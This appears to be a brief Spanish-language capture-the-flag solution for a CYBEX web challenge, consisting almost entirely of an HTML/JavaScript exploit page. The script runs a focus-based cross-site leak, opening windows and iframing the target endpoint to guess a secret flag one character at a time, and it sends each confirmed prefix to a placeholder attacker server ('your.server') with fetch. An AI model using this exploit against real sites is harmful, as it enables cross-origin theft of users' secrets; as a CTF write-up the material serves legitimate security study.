Contexto: tweet, tweet.

Código fuente: github.

<html>

<head>
  <meta charset="UTF-8">
</head>

<body>
  <script>

    const localURL = "https://127.0.0.1:4000"
    const remoteURL = "https://your.server"
    const alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"!¡¿?&%'(),-/:;<=>@[\\]_`{}~".split("");
    let known = "CYBEX{¡wAlO_`L0v3S`_¿f0cUs?&Sam3SiT3!}";
    let iterator = 0;

    if (location.search.substr(1)) {

      window.addEventListener("message", (event) => {
        const frame = document.createElement('iframe');
        frame.src = `${localURL}/walomsg?flag=${encodeURIComponent(event.data)}&msg=foo#msg`;

        frame.onload = function () {
          setTimeout(() => {
            if (document.activeElement != document.body) {
              event.source.postMessage(event.data, "*");
            } else {
              event.source.postMessage("justCloseMe", "*");
            }
          }, 500);
        }

        document.body.appendChild(frame);
      });

    } else {

      window.addEventListener("message", (event) => {
        if (event.data != "justCloseMe") {
          known = event.data;
          fetch(`${remoteURL}/FLAG/${encodeURIComponent(known)}`)
        }
        event.source.close();
      });

      setInterval(function () {
        let char = alphabet[iterator];
        console.log(`Testing ${known}(${char})`);

        let win = window.open(`${location.href}?foo`, "_blank");
        win.addEventListener("load", function () {
          win.postMessage(`${known + char}`, "*");
        })

        if (iterator == alphabet.length - 1) {
          iterator = 0;
        } else {
          ++iterator;
        }
      }, 50);

    }

  </script>
</body>

</html>